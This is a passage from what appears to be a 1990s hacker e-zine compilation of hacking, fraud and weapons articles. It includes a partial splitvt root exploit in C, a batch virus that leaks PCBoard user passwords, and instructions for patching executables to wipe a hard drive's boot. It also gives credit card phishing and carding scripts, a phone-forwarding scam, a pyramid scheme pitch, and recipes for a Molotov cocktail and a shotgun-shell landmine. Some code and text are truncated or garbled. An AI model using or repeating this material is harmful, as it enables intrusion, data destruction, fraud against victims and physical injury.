but the sysop doesn't know, is that MUSIC.TPU actually contains a trojan.
Many times the sysop won't think twice before running a source he has
checked out... This thing can probably also be done in C++ etc. (with
OBJ files or something?)
4. Make yourself a new identity. Call yourself something like 'W3ZLR!' or
some lame shit. Then you start calling up all the lame sceneboards and
start pumping lotsa new ansi-packs, demos, and other scene stuph. Always
page sysop and get a little chattie with him before you leave, give him
compliments about his cool-styled board (wich is crap ofcourse), and
how good connect you got etc. Make yourself a little fake group, and
release some ansi-packs and shit (5-mins rips ofcourse). Pump, and
continue this a while. After a while most of the sysops will like you,
and you'll be known in the scene. When you've gotten this far, the sysops
will run everything you tell them to, now you can take down the whole
lamer scene in your country, and be a very populear dude everafter. ;)
Hum, it sounds so easy! ;)
Well, that's probably cause it often IS easy. Many sysops are so dumb they
will run anything you tell them to, so it's no big deal really (It's never
been for me anywayze). Some big boards however, never run the stuff they
get uploaded, and those are a bit harder. But still, the clue is; Chat with
the sysop, get to know him, and play a nice guy. Upload be nice, and develop
a good relationship with him - A relationship you can hack on ;)
- Keep hacking strong, Codeblaster/TBH
A Way To Hack Unix
A way to hack Unix if you are lucky, and the Sysadmin is an ass.
By: Phiber X
Okay, basically the problem with hacking unix is that it doesn't report whetter
you typed a username that doesn't exist or whetter you got the password wrong.
Anyway, here's a solution that might work (see title of this doc).
Basically Unix may have certain usernames that does nothing but execute a
command, and consequently if these commands are not obviously dangerous to
the system they may not have a password.
Basically here's what you do:
login: rwho
login: who
login: finger
login: rfinger
These commands are typical for any Unix system, and what they do is that they
display who is currently using the system, and then logs out. Useless? I beg
to differ... Because now you know a username (if there are anyone on the
system that is), and can consequently start to worry about the password..
Now, hacking a password has many sides to it, and basically they are "brute
force", that is write a script that tries all words in a txt file, or just
plainly ASCII upload a txtfile containing tons of common passwords. Another
is if you really are desperate to hack this account, to find out something
about him, that is name of his wife, date of birth, the car he drives ( you
would be surprised how many accounts that can be accessed by simply using:
login: (a common name in your country) eg. Smith(USA) , Hansen(Norway)
or Olsen (Norway)
password: BMW (or Mercedes)
In this case though it's more likely that this guys password is his dream car
rather then his actual :)
But in my countless hours spent on the net I dumped into something spectacular,
a procedure on how to break any password !! Quite amazing I thought, and quite
frankly it hasn't worked for me yet, but then I have only tried it a couple of
times, and haven't been very exact. Anyway here it goes:
1. Type: TH778$ ^^rUi
2. Wait 23 seconds
3. Type: R$%%78 ''TY
4. Wait 10 seconds
5. Type: 67Z//
(keep strictly to the timelimits)
I suppose the way to get this right is to make a script in a comm. programs
that sticks to the time limits, but you do what you will with it.
Now that's one way of hacking Unix, if you're lucky and the sysadmin is an
ass :).
Written & researched by: Phiber X
If you have any luck with the password formula, please let me know, I'm not on
very many boards at the time as my exams are coming up shortly, but try Death
Wish or Zero Reality in Norway. Planning on getting an anonymous mail "thing"
but haven't bothered yet. C YA!
Oh, yeah.. if any of the authors of the password formula read this and are
pissed because I didn't credit them, well... sorry, at least I didn't take
the credit myself.
Hackers vs. Warez d00dz
Hackers vs. Warez d00dz
Don't you just hate those fucking kRaD 31337 WaReZ d00dz that's increasing
in numbers every day? There's always been this "wall" between hackers and
warez d00dz, cause hackers must be the only ones realising how fucking lame
the warez d00dz really is. The BBS kiddiez, Ld-dudes, newbies (etc.etc) all
look up to the warez d00dz, probably cause they have to buy their shitty
games themselvs. The warez d00dz however, "GET IT FOR FREE!!!". wow!
The lame warez d00dz spend hours downloading shit they don't even know what
is (they know that it's 0 days old - and that's enough for them), and when
they get it, they spend even more hours uploading it to a LD warez board with
a crappy CPS. Don't get me wrong, I'm not talking about couriers. Couriers
do a job, a job that makes sence. They distribuate a group's work, and get
it spread. Warez d00dz however, make no sence. I mean, they download, and
they upload, and for one purpose: Get better ratio, so that they can d/l
more, and u/l more to get even better ratio some other place, so that they
can... It's a neverending idiotic circle.
I don't have anything against warez. Warez is good. Most hackers use pirated
software as well, and sometimes they probably even download the same software
as a lame warez d00d. The differense is however, the purpose of the download.
The warez d00d downloads it for the reason explained above, the hacker
however don't give a damn how old it is (as long as it's the newest version
of that software that is), and the reason for the download is cause he WANTS
TO USE the software. He wants Turbo Pascal cause he needs it to make programs,
not cause it's *NEW* and it's gonna give lotsa credits and better ratio on
some lame warez board/site.
Also, a hacker doesn't brag about how elite he is. The warez d00dz often spend
hours argueing who got the ware first. Who released the lame game first, who
faked the release date, who got it first in Europe, blah. Who fucking cares?
I sure as hell don't. Another sympthom of a warez d00d is that he thinks his
eleet status can be measured in how many 0 day warez he's got. "I got 300 megs
with 0 days warez on my server now!". Wow! So, what is he going to do with
those 300 megs with warez? The answer is; nothing! He's just using it to get
more warez tomorrow, and the day after that, and the day after that (as
mentioned earlier; the neverending idiotic circle). What's the point, if you'r
not a courier, and if you're not using the software? As someone on IRC put it
so wonderfully;
"#hack is full of users who steal software,
#warez is full of users who steal software,
and tell everybody about it."
I'll agree to that alright. And on #hack, the dudes have a purpose for stealin
the software (and not that lame reason the dudes on #warez have (ratio))
Or as someone else gave an example of a typical warez d00d:
"I released King's Quest IVXIX before you so obviously my testicles are
larger." - kRaD WaReZ d00d!
Yeah, obviously! ;)
So, a big fuck-you goes to #warez* and everyone on it! You're all so eleet you
make me pee in my pants!
-Keep hacking strong, Codeblaster
Wombat: A Pcboard Batch Virus
rem Every line containing "wombat" (in uppercase) will be copied!
rem Every line in only uppercase is part of the virus!
rem %_wombat_% is just an empty variable!
rem Every line with "rem" is a comment!
rem Wombat V1.0 By TNSe! :)
rem The Last Word In Batch Viruses ... uh?
rem Absolute Size : 1187+ bytes... (Hint: Infect a 0 byte .BAT file,
rem which is partly interesting, cause it shows you a bug :)
rem PS: They are slow? .. What? are you running with NO smartdrv?
rem or is your machine just another 386-12 MHz?? ;)
rem This BatVirus will make a command in PCBoard Help called
rem Wombat. Just make the SysOp run this BatVirus, and enter
rem ? Wombat in the PCBoard prompt!
rem What part of the BatVirus do we want to execute?
rem is this bat file Already infected?
rem not good ... already infected!
rem Here we do the infection
rem Does the backup file exist? Don't show errormessys by checking!
rem Copy the file to %TEMP% .. if there's no TEMP, then the root will be used
rem Copy Wombat into a new file!
rem Attach the Original file!
rem Delete the copy
ECHO. >>%1%_WOMBAT_%
rem Place an extra enter before the next ...
rem Where to jump when WomBat is finished!
rem exit this batvirus
rem Main procedure!
rem %0 is the name of the starting file
rem if the guy wrote the name of the file, without .BAT ... he shitted
rem Well... This means that it is AUTOEXEC.BAT we are in! (Because
rem %0 is nuttin when autoexec.bat is called!
rem ... let's fix it!
rem ... clean out tail before entering
rem if %1 is empty, quit this and continue
rem copy next %1 into the command tail...
rem (%_wombat_% is empty) this command makes %1 become %2 .. (rotates
rem %1 %2 %3 ... %9 So that every parameter passed is kept!
rem Keep copying
rem find a nice file to infect
rem this is the routine we want to do!
rem find some fine victims!
rem next time, we're outta here (And do some damage!)
rem Make it look like santa claus was here (nobody saw him?)
rem Here we do the trojanizing :))
rem ... no more paths to look through!
rem .. now %0 becomes %1, %1 becomes %2 .. etc
rem .. if PCBoard.exe didn't exist there ... too bad! :)
rem ... that was the dir :) ... hehehehehe
rem which makes a file C:\HISDIR!\HELP\Wombat with the contents:
rem %C:\HISDIR!\DAT\USERS, that will list all his users and PWD's for you..
rem as long as it is not crypted! .. argh :)
rem .. We've done enuff!
rem Go through ALL the path statements ... looking for PCBoard!
rem .. hehe.. .Let's hope he has his PCBoard Dir in the path ...
rem getting outta here
rem all variables cleaned out ... Like Spring cleaning! :)
rem the absolute last in this BatVir!
How To Get Root On a Linux
How to get root on a linux host if you have a shell on the host...
With the splitvt exploit.
one day i decided to play around with telnet and ended up with :
Playing around on a local server i tought to myself.. HEY there must be
a way to do that.. now you think to yerself "Lamah to do WHAT?!" well to
hack the shit.. i thougt IF you had a SHELL on you'r victime's machine..
and wanted to fuq the shit.. upload this phile
------------- ( Cut ) ------------------------------------------------
/* splitvt exploit
* syntax:
* cc -o null null.c [kfc96 exploit]
* $>null [LiNUX systems affected]
* $>null
* $>splitvt
* $>whoami [root]
long get_esp(void)
__asm__("movl %esp,%eax\n");
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
------------- ( CUT ) ---------------------------------------------------
and ren the file to "null.c" upload it to some directory or somthing..
now what this LINE / FILE tryes to do i give you ROOT status..
it uses ASM (Assembly) so you need to compile it.. by typing..
1. gcc -o null null.c
2. root
3. whomai ..
3. adduser djnad <HEhe>
4. adduser TBH <w3-k1ck-ass>
if your shell or your provider doesn't allow you to use compile or GCC
.. you'r sold - you can't run the script.. so don't bother.
what HOLE this script uses I realy don't know.. but it works..
anyway's IF it worked.. you would have ROOT (GOD) status.. :).. you can
DO what EVER you please with the commputer.. yeah.. anyway's DON'T BLAME
ME if this doesn't work for u, and it fuq's up the server.. blame yourself
for doing it..
I have not tested is.. couse i can't afford being busted right now at the
moment.. since im going on away to an forgin country for som weekeeis.. :) but
it work's TRUST me. ..
------------------------------ ( Djnad / -TBH^Pd-Kru ) - ( djnadX08 ) ---
Visa/Creditcard Scam
Someone has to have thought of this one before! ;) Anywayze, I'm releasing
it cause it was a cool idea I got the other day, and it works really nice.
You know all those sex-payweb-sites? You enter your visa/mastercard/whatever
and you get to enter the realms of PORN? ;). You enter fex. your visa number
and pay eg. 25$ to see live nude girls stripping etc. Well, what about setting
up your own little TEMPTING sex site, a real payweb sex site, so that people
has to enter their visa/mastercard etc. to enter. Setting up your own site,
and advertising it enough, can get you alot of valid visa's.
Ofcourse, you can't set it up on your home-adress, cause then you might get
busted for this, so what you do is getting a site from one of those free
website providers, here are two adresses you can use:
I'm sure there are more of these too, but these two will do for now.
Now you just rip some html code from a payweb site (or make it yourself if
you're not an inet-lamah), and set it up. Modify the code a bit, so that the
visas are saved/encrypted in a DAT file, witch you just visit to collect
once in a while. (Remember - never make the code so that the visa's are sent
to you or something, cause then you'll get busted for sure).
- Keep fraudin' strong, Codeblaster!
Credit Card Scam #2
Saw this one on 'NOWHERE MAN' :)
YOU: Hello, I'm calling from Seltec - we're releasing a new hair product,
and wondered if you would like to get a free sample?
HER: Ohhh.. yes!
YOU: OK, I need your name and adress then please.
HER: Sure, it's Dumb Bitch, 502 Looserstreet, Looserplace.
YOU: ... and credit card number for future buyings.
YOU: Ok, thank you Mrs. Bitch, you will have the sample in your mail
in a couple of days.
Some people are dumb you know. It migth be an idea to know who you're
calling, so you know if they're interested in a new hair product at all.
And, It might be a good idea to mail her some shit too, so that she doesn't
get suspicious when she doesn't get anything in her mail.
- Keep fraudin' strong!, Codeblaster
How To Obtain A Visa
How to obtain a visa card number?
You report your neighbour's visa stolen and they shut down the card and say
that they will send you a new one soon. Every morning until your neighbour
gets the visa, you wake up early and check your neighbour's mailbox. Eventually
you will get the visa, and now it's ready for abuse. ;D
, ripperjack
Phone Scam
I've translated this text directly from norwegian to english, so I'm not sure
it'll be just as convincing in english, but you'll get the idea. Using re-
YOU> Hello, my name is Tommy Hansen and I'm calling from Telecom West, we
have experienced some problems with your telephone line.
HIM> Oh? What kind of problem.
YOU> Your line has been crosslinked sir. That means you may have experiensed
line noise, sudden line-cuts, other voices on your line, etc. This is
quite irritating for you ofcourse, and fortuately it can be fixed very
easily. Can you find a pen and something to write on sir?
HIM> Yeah, sure.
<Finding pen & paper>
HIM> Ok.
YOU> Good, write down the numbers I tell you, and enter it on your phone as
soon as I hang up.
HIM> Ok.
YOU> *21*003190320320# - You got that?
HIM> Yeah, *21*003190320320# Right?
YOU> Yes, that is correct sir. Ok, I'm going to hang up now. Just enter the
numbers, and when you hear an 'alarm'-like-sound, you hang up.
HIM> Ok, and everything will be fixed then?
YOU> Yes, as I said, this is just a minor problem.
HUM> Ok, bye then.
YOU> Bye, and thanks a lot for your help (and I mean that!)
If they refuse to do what you tell them to, there are several things you could
say, like:
- This is just a small problem. It's alot easier if you could do this yourself
so we don't have to send someone over to you.
- Ok. We'll send someone over to fix it rigth away, you will have to pay the
extra expences of 78$ though.
- We will have to cut your phone for a week or two until we can send someone
over to fix it then. (No more phone privilegies for you! ;))
Almost everybody will do as they tell you if you say one of the above, no one
wants to loose their phone for 2 weeks, or pay 78$ for something they can
do in 2 secs themself. But remember; this require you be convinsing and don't
sound like a 14year old kiddie.
- Codeblaster/TBH
Hackers guide to INTERNET OUTDIALS.
1. What are internet outdials?
2. How are they accessed?
3. What can internet outdials be used for by hackers?
4. What are the adresses to some internet outdials?
5. How can internet outdials be found?
1. What are internet outdials?
Internet outdials are basicly modems connected to telnet sites
that can be used by users of the site to call out.
Naturally if the site that offers this to it's local users is
connected to the internet, then anyone who can access the site
can use the outdial (that is if the service is not restricted to
local users, which it often is).
Usually the outdials are restricted to making local calls, either
by disallowing certain affixes to be dialed (that is numbers that
come first (much like the man when having sex, wait.. no not really)),
or by having set the first few numbers and only allowing a certain
number of numbers to be manually entered.
There are however exceptions to this, these are called Global OutDials
(GOD), and allow long distance calls. These are however very rare, and
tend to close down quikly if they are released.
2. How are they accessed?
By using a telnet program when connected to your ISP, and entering
the adress of the telnet site and channel at the appropriate place.
Then just manouver your way to the outdial (usually obtained by
entering ATDT XXXXXXXX, where X is number, but this varies greatly).
3. What can internet outdials be used for by hackers?
Aha.. The essence :-)!!
Now, IOD can be used for many things, the most obvious beeing able
to connect to foreign BBS's on local charge. But to real hackers, that's
not really FUN (it can be however, quite usefull when the phonebill comes).
The thing I see it most usefull as is to avoid detection when hacking.
Because: A direct connection to your target is (to say the least) quite
risky especially in these digital days, but if you first connect to the
inet, call an outdial, say in Britain, and then connect to your target in
another country, then tracing you will be A HELL OF a lot harder, also if
they trace your phonecall to another country, then they usually must be
SERIOUSLY pissed to bother trying to find you. Like they probably are at
those guys that deleted 11.000 homepages on "Telenor" ISP in Norway
(Way to go guys, whomever you are! ).
4. What are the adresses to some internet outdials?
First response: "I don't have a FUCKING clue when you read this"
Second response: "Check out 2600 faq available almost everywhere on
the net, they have a pretty good list"
5. How can internet outdials be found?
a) Search the net
b) Check out good hacker releases, 2600 and Phrack for example
c) Learn how to get access to some of the outdials in the 2600 faq
and use these commands on other telnet sites you encounter (or hack).
Chances you find one is.. ehmm.. slim, but if you do your in for a
Written by Phiber X, of "No Shit!"
at 01:28:39, the 9th of April 1997
I can be found on Death Wish BBS in NORWAY, if you have any comments,
please let me know (that includes any outdials you might have :-) )
Visa Carding Made Easy
Visa Carding Made Easy
Ok, anyone knows that a visa number is 16 digits. How it's build up
though, is more unknown. It's really easy, and in this article I'm
going to show you how to get someones ViSA number just by getting
their bank number. .. eh, bank account number - whatever (no: kontonummer)
The visa number is always build up like this:
Ú> Bank Account Number
À> Bank Prefix À> Unknown (X)
Prefix : 4925 (Always 4925 in Norway!)
This is the bank prefix. If you have a list, just search
the list for the name of the bank, and you'll find the
prefix. If you don't have a list, get The Generator 2.0
when it's out :)
Account : 3531 15 31892 (example)
Unknown : 2
As you see, this makes 16 digits - a valid visa card number.
- But, how do I find X?
Well, to find the unknown (the last digit in the visa), use some visa
generator to validate the card, try using 1 first, if it's valid then
write it down. Then you try 2, etc. and write down the numbers that
passed the test. If you got more than one number that passed that test
then you'll have to do the 'payweb test' to. Just login to some payweb
porn site on the net, and try the different numbers, the payweb site
will check the number, and you'll find the correct one.
How to do it:
What you need is quite simple someones bank account number, and that's
not hard to find at all. Just visit your local bank and get some notes
from their trash, on many of these you will find:
1) Cardholders Name
2) Bank Account Number
Use the method explained earlier in this article to get the visa number.
Now the only thing you need is the expire date, visit some payweb porn
site on the net and try out every date (3/1/97, 2/1/97, 3/1/97 etc.)
Now you've got, Cardholders Name, Visa Number and Expire Date. What more
do you need? Go card! :)
- Codeblaster/TBH
How A Pyramid Scheme Works
1) This is how our pyramid looks, every star presenting a player.
* *
** **
2) Eight new players have joined, each paying f.ex. 10$ to the one on the top
of the pyramid.
* *
** **
**** ****
3) Now the guy on the top has received his money and disappears. The pyramid
will split into two pyramids.
* *
* * * *
** ** ** **
4) This will repeat itself thousands of times untill the pyramid stops. When
the pyramid has stopped, a lot of people will loose their money, so join
early and you're ensured profit.
- Ripperjack
Easy Explosives
I don't take any credits for this file, as it's just stuff I've picked up from
different bbs's and text files, not figgured out myself. Since I remember it,
it has to mean that it's easy-to-make explosives ;), so here's a collection
of recepies for you who just hate those "76% sulfiric+23% nitric acid+ etc.".
_oO ::;'
_(_ _ / o O ( sounds scary! )
--[1]---------------------| - PLASTiC EXPLOSIVES - |--------------------[1]--
Here's what you do to make some easy plastic explosives:
Mix: 2/3 Vaseline |/////////| <- Gasoline \
1/3 Gasoline |%%%%%%%%%| > Mix'em
|%%%%%%%%%| <- Vaseline /
Now, this mixture has to be set off electricly (that's why it's called
plastic explosives, dumbass). That means that some matches won't do, so
make yourself a little electric detonator and you're rockin'.
_oO ::;' ( think I'll stick
_(_ _ / o O ( to my pipe...
--[2]---------------------| - SMOKE BOMBS - |-------------------Ä[2]--
Smoke bombs can come in handy sometimes, fex. if you want free from school
and stuff like that ;)
1) Mix: 1/3 SUGAR
2/3 EPSON SALTS (Magnesium Sulphate - you can easily get this from
school or something, and it's not illigal, so you
can legally get it elsewhere too)
2) Put the mixture in a tincan (an old coke-box or something) and heat the
stuff up with a lighter or something, so that it melts.
| | <- A tincan
| .:. | ________
| .,;::;,.| <- the mixture |/
`---------' |
/| | <- rest of the
|~| <- Lighter ________| coke-box ;)
3) Now, wait a while, so that the gel hardens, then add a fuse (a match
or something)
And voila, you've got yourself a little smokebomb, and this one is quite
goot too :)
_oO ::;'
_(_ _ / o O ( hum, interesting
--[3]---------------------| - DISKETTE BOMB - |-------------------Ä[3]--
You've probably heard/read about this bomb before, since it's an old one,
but I'm including it here anyways, for those of you who haven't seen it
before (coz it's cool :)
What you need:
1) A Diskette (3,5")
2) Matches (Those you can ignite anywhere)
3) Nail Polish
4) A knife
What you do:
1) Use the knife to open the diskette (split it into to pieces)
2) Remove that white, round, cotton shit inside.
3) Crush the matches into powder with a wooden scraper or
something, so that you have a nice little amount of match-
4) Spread the powder inside the disk, like nice, white snow
on a winterlandscape (ahh... poetic huh?)
5) Spread some nail polish over the match powder laying in the
diskette, and wait till it's dry.
6) Put the diskette back together, and use glue or something
(or the nailpolish!) to make the two pieces stay together.
Now you've made yourself a little diskette bomb, and when your "friend"
puts it in his diskette drive, and the drive head attempts to read the
disk, the disk starts to spin, and ... the result will be an ignition of
the matches inside, wich will cause the disk to melt in the small fire,
and it'll be stuck in the disk drive. Quite nasty ;) .. And remeber, you
have to use those matches that you can ignite everywhere. Have phun!
_oO ::;'
_(_ _ / o O ( napalm stuff....
--[4]---------------------| - FIRE BOMB - |-------------------Ä[4]--
Oki, probably everyone know what this is. You know those bottles you see
the demostrants in eastern-europe etc. throwing at the millitary tanks and
police in a riot. Yeah, those are the one I'm talking about. Now, most peopl
think it's JUST gasoline in a bottle, but here's the way to make a good
What you need:
1) A bottle or a Jam-Mug (so long it's made out of glas)
2) Gasoline to fill 2/3 of the bottle.
3) Oil to fill 1/3 of the bottle.
4) A piece of RAG (a piece of an old t-shirt, whatever)
* 5) Cork for the bottle
/ * \** <- Gasoline-Soaked rag
|:::::| +-------------------------------------------+
|:::::| | Guess everyone know how to use this one, |
|:::::| <- 2/3 Gasoline | just ignite the rag-fuse, and throw the |
|&&&&&| | bottle. When the bottle lands on some- |
|&&&&&| <- 1/3 Oil | thing hard, it will break, and the oil/ |
~~~~~~~ | gasoline mix will ignite, giving it a |
| sort of "napalm" effect :) |
_oO ::;'
_(_ _ / o O ( yah, in the good
Ú-----------------\__\/_/--¿ ( old days we'dd..
--[5]---------------------| - LANDMINE - |-------------------Ä[5]-
Here's a simple way to make a landmine:
You need: 1) A Wooden plank
2) A Brick
3) A Shotgun Shell
4) A Big Nail
What you do:
- Use a drill or something to make a hole in the brick. Don't make a hole,
straight through, just so you can put the shotgun shell in..
- Put the shotgun shell in the hole.
- Nail the nail through the middle of the wooden plank.
- Now, place the wooden plank on the brick, so that the nail goes into
the hole that the shotgun shell is placed in.
| wooden plank || <- nail |
.--------------------------. || .------------------------------------.
| | || | |
| brick || || || |
| || || || |
| || \/ || |
| ||~~~~~|| |
| || || <- hole w/shotgun shell in it. |
| ||_____|| |
| ~~~~~~~~~ |
As you see in the ascii above (nice ascii huh?;), that when somebody steps
on the plank the nail will put pressure on the shotgun shell, and it will
go off sending splints everywhere. Now go bury it somewhere...
- Keep Hacking Strong, Codeblaster!
Newbie Flooding
Hey there.. well I'm off with a bit new information.. see irc (internet relay
chat) is very common these days so I thought I might teach u sum.. this
file will not contain any hacks or whatever, just some basic information
on irc. how to protect yerself.. and how to avoid ppl annoying your ass off.
so read and have fun ;)..
*NOTE* sorry if my english is a bit rusty, but I don't really care!..
irc is a chat program, usually the command irc at your unix prompt will give
you ircII, then yer ready to go chatting, (Norwegian - Prv via unix prompten
irc <IRCnicket dit> (To find irc server's try searching the
web for IRC servers) well the most used and the oldest server I guess is
EFFNet (Electronic Freedom Founduration Net) it's the largest, and the second
larges irc server is Undernet.. well I use EFFNet, so I suggest you do too
;).. well ok, before you get TOO exited, you might want to know that there
are some loonies on irc to, ppl who just want to have fun with you, and mess
up your great time. ppl who do takeover's on channel's and play around with
your stuph.. if for instant you start a channel called #megafun you're the
first in that channel you get OPS (@X07
kick and ban ppl from you're channel.. so let's say you have gotten some
friend's in you're new channel, and suddenly some on comes in the channel and
want's op's, you SHOULD NOT give them ops, the may just fuck your channel,
and you may just say bye bye to it.. well if you're smart and don't give them
ops, they probably will try to do something else to get ops. like flooding
what flooding does is to send something to you as many times' as possible.
for instants a TXT flood will send you alot of msg's giving you lotsa crap on
your screen, this is really annoying but usually can't cause any
could stop txt flooding by using the command /ignore IRCnick. but let's say
this guy wants that op so bad, he doesn't give up.. he would probably
begin to CTCP or ICMP flood you (They are also know as nuke or mass flood)
*NOTE* ICMP stands for Internet Control Message Protocol (so you IRC internet
elite loonies, if you dind know that, you're a LOOSER! :)) for instant
icmp redirected messages are used by routers to tell other computers "Quit
sending me that junk, send it to No !" so an
ICMP redirct message could cause your irc messages to go to hell.
eof stand's for "End of file." "Dead Socket" refers to ppp, or in other
words you aren't on irc any more.. you quitted..
other ways to flood is to ping flood you (Ping will send a msg to the guy
you ping and return to u and tell you how long time it used to reach the
other guy), ping flood is also know as ICBM flood.
so what all that I have written above is to say "Flooding = Sending as much
crap you can to yer victim.. ok how's more detailed info..
---------------------------------- TXT -------------------------------------
the simples way to flood some one is by TXT flooding someone, by sending
the same msg Over and over again, will be f***ing annoying right? saying you
got the same msg 10 times in 4 sec? yeah.. well it's not much more use
to flood some one by txt, cause most servers has text flood filter's
So only txt flood some one if you want to be annoying ;)
---------------------------------- CTCP ------------------------------------
Ctcp (Client to client protocol) flooding is the most effective flood.
this is kinda like ping, it checks if you're host is weither or not alive
so if you make a script doing the command /ctcp <nick> echo FUCK YOU THIS
IS A FLOOD! 100 times it's a 100000 time more effective than txt flood!
but the only backdrop is that you would get an answer 100 time too =(
so leave out the ECHO part ;).. ok well the next and just as effective as
the ctcp command is the PING command.. it operates in the same way (DAMN
well ok, a more experienced flooder would ame at your "dynamically assigned
IP" (Internet protocol) he would not flood you at the irc, nor at the server
by you MODEM directly, so if you got an 28.8 or 14.4 modem, and the flooder
got an ISdn connection, you're bound to get dropped off, or if you're really
luck only Lagged like hell
ok, so? what are you trying to say don't use irc?
no what I am really trying to say is to, get a program that runs in the back
ground of the proggy u use to protect you're self.. script's like Spam.irc
phoenix, acid!irc, 7th Sphere, PhytKrakr, |MaGuS|, precurser Etc. Etc.
Well since this is the most LAMEST thing I've ever written, I have decided to
quit RIGHT here.
have phun
Djnad / enterprise (C) 97
Fake Emails
Is there anything like sitting in a chair with some nice jungle uplifting vibes
in the background. a cup of tea, reading? Letting the information flow through
your brain.. NOPE, there isn't!. Knowledge is power and power is the coolest
thing you can ever poses.. so therefor have I decided to write my knowledge
so you can, expand yer knowledge, and yer power! so please, put some music on.
make yourself a cup of tea, and get the power you always wanted to poses.:)
well that's all the morals I'm gonna teach you ;).. hehe, on to the real
Hacking. the word conjures up evil computer geniuses..
Just a small note! for you newbies / wannabies
Define: 3l1t3, 31337, and so on, all means "Elite", the hacker's who do some
elee7 thing almost always use some thing's to make the writing a bit more
advanced, like if I would write access it would probably be soothing like
axx or acz, axz etc. etc.
ok one more thing I'm sick of ppl (People) saying "I want to learn ElItE
hacking but I don't want to learn unix, nor programing!.. d00dz YEAH,
GIMME SOME CREDITCARDZ!" FUCK EM!.. ha, they suck the whole secret behind
hacking is knowledge, the lust to learn.. and reading. this do not mean that
you should never do a hack. but it means you need to have the will to learn..
hanging in #2600 or #hack #phreak etc. etc. do not mean that you're a hacker..
an hacker operates online and offline... ok well on to the next part ;) fake
email via telnet, this /hack/ (Ehm Hrmze) means you could really do some
heroic hacking in 1/2 hour! impress you're friends! ;)..
Ok have you ever heard of Robert morris? he was the creator of "morris worm"
witch took down the internet in 1990. of course the bug that he exploited to
get the worm to fill up 10% of the computer systems on the internet with
his self mailing virus has been fixed on most internet computers..
But there is still some heroic thing's you can do ;).. not take down like 10
systems in 10 mins, no. you can use the same method that Robert M. used
forge email! whoa doesn't that sound cool?.. well it is.. you can do some
evil deeds with that.. I'm not gonna teach you how to break into private
parts of the system (YAH HAPPY HARDCORE RULE! cd yaknow ;)), besides I'm not
very fond of jail.. ;) well to do this /hack/ you need a shell account!..
if you haven't got one yet, GET ONE!.. a shell account is an internet account.
witch you can use unix command's (Norwegian note! - SN internet har slike
accounter! get one!) well unix is the language on the internet, so if you want
to be a REALLY good hacker, you will need to learn unix.
Ok when you have gotten your shell account, let's say that you're on it now
and are able to use the unix commands.. test the telnet, do this:
"telnet ns.interlink 20" if you get to interlink and get some stuff on your
screen, you're in business! ;) if you never telenetted before you have done it
now! ;) cool?, well this /hack/ is STUPID simple, get to the prompt again
norwgian note again - har du sn s vill det vere do this command:
"telnet 25" (I took this ip cause i know it allows what we'll
do, right fake emails! ;)
What that "25" in the back means' is that (once AGAIN HAPPY HARDCORE RULE!)
you telenetted to callisto's email send port (An port is somewhere informa
tion goes in and out. on yer PC you got standard 4 port's Screen,mouse,modem
Keyboard. well these hostes on the internet has ALOT of port's that's not
physical, nope you can not see them ;)..) you may happened to hit a firewall
(Security program), but most often you won't, well I'm sure you got into
callisto so let's see what we can do .. Whoa, it didn't ask for a logon, it
just say's READY!. cool?.. well that's cause it runs "Smail3.1.28.1" it's
a email program, type "help" or "?" and you will get
250 The following SMTP commands are recognized
250 HELO hostname
250 MAIL FROM:<sender address>
250 RCPT TO:<recipient address>
250 VRFY <address>
250 EXPN <address>
250 DATA
250 RSET
250 NOOP
250 DEBUG [level]
250 HELP
250 QUIT
+ some more crap..
do it like this
----------------------- The hack! --------------------------------
rcpt to:mmiriX08---------------------------------------------------------------------------
now check your mail ;).. have phun
Btw; don't go and buy book's like "hack the unix Super manual 200"
no real hacker's read and study Book's like the unix manual!
Djnad / Enterprise
Finger Trick
Hey, once again ;) it's me djnad again.. well since I first learned you
how to fraud emails' here's how to finger user's via telnet.. really really
simple ;).. but very useful, in fact finger (port 79) is the most common way
to crack into non-public parts systems and get unauthorized axz!..
and one more time, AN shell makes it a helluva lot easier!. ;) ok here we go
you've entred the shell account now I suppose. do a
finger harryX03
but replace harryX0Btelnet 79
now, you'll enter the finger port on hasle. you can enter hasle with out a
password.. kewl?.. well you can just enter one command.. enter the command
what you did was to finger my user account, it will give some stuff about
me, my login name, my email, if I have some unread email's etc. etc.
well do the same and try these names (Commands)
There no point in hacking/cracking hasle, cause there no cool stuff to get
*HEHE* root is the best access you could get! but none of these command's
will give yah root access =/..
Remember the eleet of the ELLLLLLLLEEEETTTT, ppl, give the sysadim a
msg on how you cracked in to the system! and maybe say how to fix it.
there are SO many thing's you could try, but I won't list them all. those I
have listed, are the most used command's to crack in to systems.
Ok, so what have we learned?
what is finger? Finger is a program that runs on port 79 (That's why we
could telnet there!) on many inet hosts. it will provide information on
a given user, on a given system..
Well for a cracker there are lotsa other thing's to do after finger..
but I won't teach those felonies ;).. hehe
Have phun
Djnad / enterprise
Trojanize EXE/COM Files
Written by dEATHWALKEr
I bet that you don't like these fuckin assholes that downloads tons of warez,
and then they don't give shit back. Then, get the latest program or game
and fix some bytes, and then give the file to the sucker. Bwahahaha
what happened to his harddrive. (Hehehehehehe!) This is an easy way to make
exe files destructive. When the file is trojanized, it can be used to fuck
someone's computer up. Ok, it is very easy to do this. To do this we will
need a hexeditor(I use NORTON'S DISKEDIT), cause we will have to change
a few bytes in the file(Only 16 bytes). The best type of file to fix is a the
EXE files(or a big comfile) since the com file will allmost use it's code
all the time. Let's get started! Search for an occurence of "CD 21", the dos
interrupt. When found, then do this. Edit these bytes into the file:
(Starting from the CD 21)
B6 00 ; * MOV DH,000H (HEAD NUMBER)
B2 80 ; * MOV DL,080H (DRIVE) 80=C:
If you should start this program, then you can kiss you harddrive's boot
goodbye(Some harddrives can NOT be fixed after this program has been run).
"Some computers save their CMOS and BIOS information at the boot."
- Crypt the program after you have patched the file (PROT or EXEPROT or ??)
- Compress the file(PKLITE or DIET or ????)
-_- <] dEATHWALKEr [> -_-
Norwegian: Telenor Suger
__ ____ ______ ____ _____ __
_) ¬. ) \ __/__l___( __(____/ ___| ¬.
_/· Y· \ \ / o· ___/ Yo· __/__(_ ! _/_
,\ . \ /\ \/ . ' . _ /
